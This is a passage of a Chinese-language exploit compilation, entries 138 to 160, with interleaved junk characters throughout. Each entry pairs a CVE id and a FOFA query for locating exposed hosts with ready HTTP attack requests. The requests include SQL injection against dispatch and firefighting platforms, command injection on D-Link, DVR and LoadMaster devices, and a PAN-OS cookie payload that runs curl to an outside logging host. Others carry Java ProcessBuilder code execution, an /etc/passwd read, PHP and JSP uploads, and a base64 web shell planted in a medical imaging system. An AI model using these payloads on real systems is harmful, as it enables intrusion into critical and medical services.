Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! e# ?  S  c% ?8 F1 o9 BAccept-Encoding: gzip, deflate, br9 ~" B5 F3 ^/ t* g7 l2 h5 ~5 \- |
Connection: close
4 O% Y8 N; E, p/ g) qCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
4 h+ {5 c) ]$ n1 I2 AUpgrade-Insecure-Requests: 1/ u& T+ t' R0 [- b* l

- A! [: e5 U2 S3 q: R4 ]$ V9 U6 v
9 _7 x4 y, K# J0 q138. 福建科立讯通信指挥调度平台pwd_update.php sql注入5 t, z0 @$ j" D* [
CVE-2024-2621
8 D, i  I  N' P" Z* P9 JFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
0 y. D& P' a8 x/ [. H, PGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
5 `( U2 S8 I* S  I# y$ |Host: x.x.x.x1 B& N: S2 h) O- @" a3 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* C- ?5 U, U0 f6 z$ {' m, x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 N+ y  [2 P3 S% c! aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! n' |8 O$ N, [$ K. g- i. gAccept-Encoding: gzip, deflate, br( s' z$ W( T0 P$ R
Connection: close( [* x1 R1 H8 C, R
Upgrade-Insecure-Requests: 1$ i0 U  P1 b7 G) A% |
9 s9 }2 y+ x* @  d8 U5 ~

# u9 u$ D8 L: C8 V- u" |4 _139. 福建科立讯通信指挥调度平台editemedia.php sql注入
: M$ Z; k& x% t1 uCVE-2024-2622  i+ p/ T1 S( I$ q( l" _
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
! I4 F: r% M* U- OGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.14 _/ @3 u/ \7 e
Host: x.x.x.x
& ^: G, `% J' ~% f; s% A/ ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( r# U" F: f& ]8 h1 h  CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 a0 P- z' k! U% K3 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  Q- k- C% E( W$ l* n  {
Accept-Encoding: gzip, deflate, br
, ^% _0 O! k! T3 ~8 X3 UConnection: close
: _& L- |2 o. `5 sCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk: f8 z  y- ~9 j
Upgrade-Insecure-Requests: 1
" l- _& _) c8 ?$ o( e5 E  a. s: R  L
: E7 k( M3 E/ K
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入: {2 f) I& }8 G4 O- d# O$ W4 Q
CVE-2024-2566! Q# \# n" ~, O* I% d- l
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% b. `, H$ k7 {! r% UGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
) f5 P1 v1 l" NHost: x.x.x.x
7 }( f3 z9 N9 v, C# q* M9 ]8 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: W" M6 h9 L' U/ o# L& c; N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 ?6 ~( {9 G, Q! uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 C' z$ i$ n% l0 ]7 s6 V7 w6 v' D+ Y2 A
Accept-Encoding: gzip, deflate, br8 ^  R3 ^# c: J/ P/ @. z4 z, R( b
Connection: close* D9 H3 }5 m. I4 N/ b3 ^0 _
Cookie: authcode=h8g99 `- n+ R% D, Z1 |
Upgrade-Insecure-Requests: 1# _) p( g$ @9 V/ @* Y/ }
( D7 s; q% v$ w9 \0 d1 Q
$ l' n1 O* Q+ `% A+ d  X
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入- b& X3 c6 y( f& K" K
FOFA:body="指挥调度管理平台"' V$ s  o' F! i/ D+ S6 F! i& i6 C4 s
POST /app/ext/ajax_users.php HTTP/1.1
$ J: f6 k+ o7 p5 Q8 iHost: your-ip) S" g% G' W, T
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info( s/ D3 |# P5 E' i; f. n
Content-Type: application/x-www-form-urlencoded
1 ^6 E( M/ j% I  H; [1 w5 t1 o. v
  _! |5 J8 n3 f3 e: ?- M. ^
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
7 M) y; y  F3 k' ]4 @4 P# r- {0 S# E& w) L: v# u
9 x# z+ F* F' t3 t0 V# N7 Z/ b
142. CMSV6车辆监控平台系统中存在弱密码
2 Y+ v: g; u- j; [CVE-2024-29666
2 y; |! @. f! {FOFA:body="/808gps/"
" z$ T$ @; t& G9 c0 B$ x2 t+ Dadmin/admin* X9 x6 l' Z7 _( M  X  D9 e
143. Netis WF2780 v2.1.40144 远程命令执行
# W7 ]0 u7 y/ I1 YCVE-2024-25850
3 {/ {# l% H7 d4 yFOFA:title='AP setup' && header='netis'8 j1 }4 B$ Q1 |  i* s, N3 [
PAYLOAD! Y* L3 ^3 ]7 f0 ^" H

, H/ K# [; M7 {1 I! T, E144. D-Link nas_sharing.cgi 命令注入- b: l0 W/ U  u7 l/ Q" i
FOFA:app="D_Link-DNS-ShareCenter"
) v6 I0 i+ X( }" Asystem参数用于传要执行的命令
8 ?" E4 C4 c: g8 pGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1$ u+ l0 ^9 T, F6 _1 Z1 B" X
Host: x.x.x.x  x! u% L3 ^3 \" C; P0 ]! Z; q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0+ T5 o# L7 u% V1 m/ h4 a" J& A
Connection: close
( W: N7 X/ o; f3 g: O1 D( HAccept: */*; u6 E( c  G+ i. t! T" z. @
Accept-Language: en
  n: P- [* W5 w5 n6 s5 U9 `" LAccept-Encoding: gzip) E; |# j( k# o

0 }0 p3 k. Y$ P) y0 M
  K# G9 t+ ]9 a/ J145. Palo Alto Networks PAN-OS GlobalProtect 命令注入8 C- A& g% r& {& p! J
CVE-2024-34005 P7 }" r8 L/ b0 _8 i: t$ a
FOFA:icon_hash="-631559155"
- l2 S8 f3 w) [* PGET /global-protect/login.esp HTTP/1.1
  {. Q. q; T3 g, o( z3 \Host: 192.168.30.112:1005
  Z+ V2 s" D1 r+ `/ j/ K! B( j7 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
+ [4 R$ X& h" p0 kConnection: close
9 ?6 \9 a( ~6 w- v' XCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
7 `7 X3 `- v. g1 s2 S+ K# v& mAccept-Encoding: gzip8 k; e& E+ I# H$ d5 J

8 Y4 v) y8 `& R7 a+ f8 f* M8 v7 f  W2 }5 f6 b3 B1 }: o* g& L3 N! r
146. MajorDoMo thumb.php 未授权远程代码执行
- o. j4 x7 H$ j" oCNVD-2024-02175
4 \/ B% o( z4 t) Y" C' r4 t& s* OFOFA:app="MajordomoSL"% l+ K3 n" j, Y) V8 N# y
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1: n4 w7 l0 B7 U8 s1 Z; _" O
Host: x.x.x.x
  b9 m  H! Y4 T. }& C7 W3 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84/ `- L" O9 ]9 G* W' D
Accept-Charset: utf-86 s) k( D+ e0 b1 {) x
Accept-Encoding: gzip, deflate; K9 g# |/ G+ V" b2 `6 v. d
Connection: close
1 y$ w; U' v3 G7 w7 X5 ~' |
: l$ M8 J9 e6 I( E4 E; x# H7 {! T3 ~. v2 k$ n, w
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
* H# y+ m5 v# [2 a8 ~" HCVE-2024-32399( ?8 Z+ S1 g. d6 q  T3 ^, G7 Z
FOFA:body="RaidenMAILD"  a& e$ J3 G, Q, Q& ^$ _
GET /webeditor/../../../windows/win.ini HTTP/1.1
4 C! Q. P  Y* e  K7 iHost: 127.0.0.1:81) b! y2 h  D' c7 z6 {
Cache-Control: max-age=0
/ |* H# L' I' a# H+ _" I& E/ XConnection: close
$ M, ^$ j% }4 y# k
" C/ ]! E: m$ U, ]0 S9 a2 V
6 I% H- ~" C1 u) W; R  k) n, @7 A148. CrushFTP 认证绕过模板注入
/ G; D: J% d- V- `0 b& KCVE-2024-4040
# Q- v/ v- o& @) I: X( r7 iFOFA:body="CrushFTP"
2 B/ y# }9 D, p$ F8 p$ ?2 w& bPAYLOAD) v2 q* O$ U" E" p0 e5 J
! D$ S/ }: ]7 k) [" v0 r
149. AJ-Report开源数据大屏存在远程命令执行: g) Q5 v+ Z; R1 o0 d9 n
FOFA:title="AJ-Report"( X. D5 r3 z4 Y: M" U

$ [1 y; g7 s  c, \( ]  S$ p- C, rPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+ @! M$ q; ], ~' ZHost: x.x.x.x
. e0 I' o/ V, T0 p  ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, b5 A, V0 `! Z) G) K# V% w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, V! d* k  j* P) v4 o" r* W
Accept-Encoding: gzip, deflate, br
+ e1 [, T& ^' j" v  HAccept-Language: zh-CN,zh;q=0.9( v3 T# d/ Y) `: c. N+ C: O3 [. a5 L
Content-Type: application/json;charset=UTF-8
! h8 r2 N5 f% A3 U1 M7 JConnection: close6 a1 W+ K. Q/ v/ _8 T

/ A6 t# Z. F" a& E/ k( s{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}& t$ m. {4 ?4 f

. v! s! J3 {2 m* ~# J( o150. AJ-Report 1.4.0 认证绕过与远程代码执行
0 I9 Y, W; f! c$ ^FOFA:title="AJ-Report"0 h2 w& ]9 X) J) Q
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
: E% H$ G# C# AHost: x.x.x.x! j' d6 a. ]& @8 r; @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( G  D$ J$ I3 _) s) VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# k- k1 j4 n, D- q
Accept-Encoding: gzip, deflate, br
' Z2 m' Y  k7 Y0 b4 K7 A7 Z- gAccept-Language: zh-CN,zh;q=0.9  H% k, h0 j% Y, x. S8 j( B& O
Content-Type: application/json;charset=UTF-80 T3 C& ^! ?( u# t3 k: g
Connection: close
, d! ^, k) R9 Q; x1 O! \Content-Length: 339) c" B3 l* [& M9 o/ n3 F
; {& B1 K+ x& o* o- q1 X
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
2 q* J: j0 S+ W  g' a
; Y) p: ]1 M: q0 h! z) ^
  }2 e3 y8 \+ l) i' N0 o% k151. AJ-Report 1.4.1 pageList sql注入- n) O5 _. }, k
FOFA:title="AJ-Report"! U: d8 A* a5 R/ L# J
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1- W9 M3 r4 M2 e% e
Host: x.x.x.x& ]9 c/ g. S3 Q. S* E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- f4 n8 [* ]0 f( `0 F) {( \
Connection: close1 l0 o) Y8 m# |  H
Accept-Encoding: gzip
. M( e( L6 O! V  N
9 T1 L, y8 q( E+ e4 b0 p$ w! n  Z; ^* O3 H3 P
152. Progress Kemp LoadMaster 远程命令执行4 J5 E' T3 \1 S' S2 b0 R
CVE-2024-1212$ W3 W1 A& i5 k3 N8 ^/ |2 j
LoadMaster <= 7.2.59.2 (GA)
! D% N2 k. e8 W: @LoadMaster<=7.2.54.8 (LTSF)$ q  T6 p% F, y7 ]8 L+ I
LoadMaster <= 7.2.48.10 (LTS)# F2 {* Z! z( r0 K
FOFA:body="LoadMaster"/ b/ k0 c, K, J$ K, H( s6 y6 c1 g9 O7 ]( G
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码0 P& J* h" P4 s2 o' y" x
GET /access/set?param=enableapi&value=1 HTTP/1.1; J: P' t) h! D8 t/ z& a
Host: x.x.x.x6 t& ^  e3 Z" R8 ?( W. v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
( K- ]" f) }4 @" V6 }; _Connection: close
4 j( J& `* O0 i, dAccept: */*
( Q- r/ @2 t" B" b2 ^( J' mAccept-Language: en  O  N* c" ~# W+ l% t+ n6 m1 T
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=  ?5 p- i* y6 k  `* e3 p
Accept-Encoding: gzip
  K! s3 W" m: {5 z
' K$ k5 A- w8 _7 }1 E" o0 M. a) ~% `6 X3 d" m5 v
153. gradio任意文件读取( |( L1 |1 ~, v( H% u! h$ ^
CVE-2024-1561FOFA:body="__gradio_mode__": m! N! r7 W6 M, T" n5 [& C
第一步,请求/config文件获取componets的id) c2 E& s' X( O! }0 p* @
http://x.x.x.x/config6 t$ J+ W0 z! ]; g4 Q$ E

. D$ K1 D4 e1 S5 m0 y; w2 V- h0 k, H9 X1 y8 @
第二步,将/etc/passwd的内容写入到一个临时文件
4 w$ d' p' H6 i: K3 bPOST /component_server HTTP/1.1
  x0 O* h/ I1 d' fHost: x.x.x.x
' \2 x( `5 A, N7 }- T1 ?  xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3) [  N3 }& F7 k9 {8 {; O
Connection: close
! }% K4 b. u  d$ P" o3 L" N5 BContent-Length: 115
# H* N; T- t" ]3 y( ]Content-Type: application/json
3 m2 c& a" T* ~Accept-Encoding: gzip
" x) ~" z- ^1 d6 m3 m$ ?) V" V
( s/ S+ n; e. Q/ I6 z{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}* N& ^% Y& Z- f1 p9 t
) z/ b2 Q1 |* u* K7 Z1 m
2 ^; g. p4 c9 x
第三步访问* r8 o- p1 [# V0 ?8 k& [7 y  g* m
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd4 ?$ A; a9 f8 U' l! S8 C% |7 E3 a
6 b4 E2 U0 z6 c& X/ B) Y  A  w

) `2 A5 _" L! ]7 i* w( L154. 天维尔消防救援作战调度平台 SQL注入
9 r/ |9 H1 M/ O: w' I7 ?+ J" [1 j- U5 oCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"7 H7 H9 _7 ~+ E* C+ X3 o( u% @  E
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
/ K8 z$ n2 ^2 l& l: }; xHost: x.x.x.x
" m5 k+ X4 g: p3 X2 k3 a! zContent-Length: 106
2 S' R5 x% j4 G5 P' b/ `Cache-Control: max-age=0
. M9 A5 b- ]$ `8 ^" G0 pUpgrade-Insecure-Requests: 1
& L+ D. `- {* }) v: \* S  H; \Origin: http://x.x.x.x
1 Z+ w# }5 g6 w1 C& x# P4 E7 BContent-Type: application/json' c! G' z# o: U: {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36! C  [5 T  M, O( K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( K' T. I% f7 j* f' T! u7 }Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page$ l7 w6 ^% m; F/ [
Accept-Encoding: gzip, deflate
  n5 L  o" `! q+ z( }9 c$ I8 EAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
; ^) [% j2 k9 @% b: hConnection: close
2 O+ D- O& ?3 N2 N, [% W* d! o2 C  _; [+ M, ]) Q
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
, X* |( I7 B$ X( `  z$ d# t
- j9 l* B  v) N) H, }& W) B% C; r- d9 ^. w
155. 六零导航页 file.php 任意文件上传1 `# c* O% L; M7 Z$ m
CVE-2024-34982/ s; Q+ w" g; F" [$ @$ u+ [
FOFA:title=="上网导航 - LyLme Spage"
) ^. P6 ?% u) p! zPOST /include/file.php HTTP/1.10 S. g* z/ _5 @
Host: x.x.x.x
( J* ^5 e: f, o% h3 P" yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( z  p3 ^2 y- H9 Q% L+ U6 W
Connection: close8 C9 o5 [& |' }. I/ Q% ^& ?
Content-Length: 232
$ F) X. }5 B9 mAccept: application/json, text/javascript, */*; q=0.01
% n( H$ F3 E' S& k; D5 VAccept-Encoding: gzip, deflate, br% ?' K+ i1 {0 F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* m$ C7 g% F3 q
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
3 k% f9 s2 C2 R# E. FX-Requested-With: XMLHttpRequest5 \6 k5 Y3 w3 y  ~
  b# ~+ t4 _2 l2 ^* }' |9 O
-----------------------------qttl7vemrsold314zg0f
' {! x  X: s( u, F7 bContent-Disposition: form-data; name="file"; filename="test.php"
; [0 N3 x7 i# i$ m0 jContent-Type: image/png9 n9 a' H9 f/ p4 l5 v

2 q: j/ B3 P% l' h<?php phpinfo();unlink(__FILE__);?>/ O6 d+ v$ |& c. D6 h$ s* d
-----------------------------qttl7vemrsold314zg0f--+ h2 B) X1 `  g0 Y+ h0 N

, b" ^4 y6 W0 N8 z8 T' }! D! Q6 w% L4 w' w1 u5 v  X$ p
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php- o% F/ s2 ^- X0 ~  Q. p* T

0 Z, r8 E- m$ F, ^156. TBK DVR-4104/DVR-4216 操作系统命令注入2 [2 _, |2 h/ O1 P* i
CVE-2024-3721
1 ]1 O! _. s/ h* T* vFOFA:"Location: /login.rsp"
: ~2 z+ L0 ?) W6 h$ g& @·TBK DVR-4104
# \! I$ m1 P2 `8 ?( q) @( Y·TBK DVR-4216
1 M- @' H2 Y8 u3 P7 Hcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"' V: L% h, j6 A$ z9 y9 t/ U$ [3 f

: g; O1 m9 |' M0 T- B
1 C* q3 w: a- |0 W7 m/ E* wPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
' }' W% j( z& p6 d  ~* }1 ^) FHost: x.x.x.x
! I. q/ Z: }; P8 N; U, AUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 v# e3 q3 T" w' i- F8 _' \
Connection: close
- n9 I# _* g7 Q% f8 s/ ~8 R+ E. ~Content-Length: 0: c/ n- Q- w: t7 L" c0 O  t1 {
Cookie: uid=1* O  W% ~; i! K. m
Accept-Encoding: gzip: ]: X; C! w$ U. Q

+ Z& n- X2 i/ m
- F8 T2 u, i  r1 v& U- ?' G2 q& |157. 美特CRM upload.jsp 任意文件上传1 h, X/ W, \* ?; H! ~6 z
CNVD-2023-06971
2 n! K& X: }4 F: R0 ?7 BFOFA:body="/common/scripts/basic.js"
  d! X  U, [9 PPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
# R$ Y9 G8 F/ ]2 ]Host: x.x.x.x
5 T3 S$ h+ j1 F1 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36  Y! q- a4 c* w. o
Content-Length: 709
) b4 H( i/ F; W& b: t  U8 [- D, c, \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 _/ M* `. w' m+ f1 h8 hAccept-Encoding: gzip, deflate$ u- F, q9 m# a+ x
Accept-Language: zh-CN,zh;q=0.9
! [+ v4 G" T5 z% qCache-Control: max-age=03 I% @/ Q- ?. j( O$ i  G1 ?; }
Connection: close: V3 {4 F3 R. h6 V% I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN' w8 ~4 v1 u) A" W7 x/ P
Upgrade-Insecure-Requests: 1$ X3 n6 c! _9 P5 D+ {

& F3 Q( t; b% w8 {- j/ b$ X------WebKitFormBoundary1imovELzPsfzp5dN$ X& [+ l3 @! }' G  F3 Q  o, L
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"! I$ |: N4 {, }7 g, ~$ [
Content-Type: application/octet-stream
7 _+ V( H& E. B! T" ?4 z% ?" w: Q. k+ g- A" Z" ~: K
nyhelxrutzwhrsvsrafb
+ }& T6 i) v# I------WebKitFormBoundary1imovELzPsfzp5dN6 L) E: v( o0 z# E% A6 g8 [) V& k2 ]
Content-Disposition: form-data; name="key"( f  g  K! p- ?. S7 T
: O: r0 e9 ?, u8 l8 x
null
$ r/ d6 b2 G* Y+ k1 J------WebKitFormBoundary1imovELzPsfzp5dN
  {8 r' H  c" sContent-Disposition: form-data; name="form"( z% v. t9 o$ d, v3 p  v, @: P
! l3 s& D9 n/ \: ]) Q5 Q% l
null* H2 s) @* B9 \1 d
------WebKitFormBoundary1imovELzPsfzp5dN
2 I2 @2 G, ^- mContent-Disposition: form-data; name="field"
! e0 j1 s3 N: w, f- n; \1 \: V: J/ d' }
null
& e- u5 H! n' n: r9 H- D( _------WebKitFormBoundary1imovELzPsfzp5dN9 O7 e% v; X) {! ~
Content-Disposition: form-data; name="filetitile"
* i* ]( F; f, ^9 o+ K+ S7 d% C. ?# F
null
8 X, l* k; }. g& d------WebKitFormBoundary1imovELzPsfzp5dN% m+ o1 `% L( c6 H( Q9 T( v
Content-Disposition: form-data; name="filefolder"
  D1 C3 N; N; i" I! z9 l$ A& C+ o% k; ^; C( k9 r6 P5 T: _; e4 h. D. `9 G# h
null
  M+ ^1 ]& z5 V% X------WebKitFormBoundary1imovELzPsfzp5dN--+ \7 a$ }% R: O9 R

9 R% v% _; K$ D, i  }5 v8 u- }- Z1 u$ |/ k1 z. {
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp6 n) X$ a4 B- u. J- f7 n# _
/ H! g- W7 {* j) D  l* N% U7 W. g
158. Mura-CMS-processAsyncObject存在SQL注入
" Q( z2 v7 c5 p+ j5 eCVE-2024-326409 ]/ _" _1 U$ @  O) q7 [
FOFA:"Generator: Masa CMS"& {; ^# o  {8 t1 {+ h. z/ a
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
% K1 ?* z" |; y; y: DHost: {{Hostname}}
2 @% I2 d& G, s2 j1 J7 I  PContent-Type: application/x-www-form-urlencoded
3 ~5 }2 H! v  G% n! {* e) D& ^. z! o6 `6 g% w' U# L* S
object=displayregion&contenthistid=x\'&previewid=18 \* J$ s; A  _. G

, w2 o1 R7 v" c) h2 }0 v
5 l' B& o7 q0 _% y6 y: ?159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传+ ~( U: v: r  Z( I" k0 G
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
& h0 M8 ?  U# b! @* [( {# m+ `3 L; iPOST /webservices/WebJobUpload.asmx HTTP/1.19 U+ o+ ?- i& f  y6 w; q
Host: x.x.x.x) Q7 D" E) V' P! }7 R% _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  c  L) e' E2 l& e, i9 |- o2 p7 t) kContent-Length: 1080
" ~! Y6 _; u4 h( Y% u6 {7 mAccept-Encoding: gzip, deflate' Y. l, t& |) V
Connection: close
" X- f" Q5 |5 j! a, UContent-Type: text/xml; charset=utf-88 l) @, I. W+ Y9 F% ~
Soapaction: "http://rainier/jobUpload"8 c2 x( ~' T/ p5 g& [0 u

( \7 W% }6 H9 t5 m0 s* e<?xml version="1.0" encoding="utf-8"?>
% w' k& Q# W4 s; h<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">, H' ~2 A% G2 x0 X5 R
<soap:Body>6 n6 b1 T* n; S  @, ^
<jobUpload xmlns="http://rainier">
$ M8 v# ^, V! J* c7 q; F<vcode>1</vcode>
7 Z  ?0 _$ t- s" f4 |& }. Q<subFolder></subFolder>8 i% I. I' S6 w: ~! o
<fileName>abcrce.asmx</fileName>
/ Y/ q( T: z; d' z' H<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>) ^5 ?& _6 D) n# R
</jobUpload>, O1 i" X  d2 B. B5 s; ]$ w! j
</soap:Body>
! I- B) }$ z8 V6 C</soap:Envelope>
& K' f/ {) F. ~! o" K9 n2 G4 }' U0 r9 j3 T$ N# u
, W7 c! j6 x' ?% @* l- ?8 `2 D
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
7 k. h! _( d/ ]1 q) `  T6 w5 r! D: f) c, c# n' ^1 ]% m
, p, F) V+ R1 a
160. Sonatype Nexus Repository 3目录遍历与文件读取- t) }( m) G1 X( P, A% X
CVE-2024-49564 G) w- p! T2 J+ Q! l4 I* w
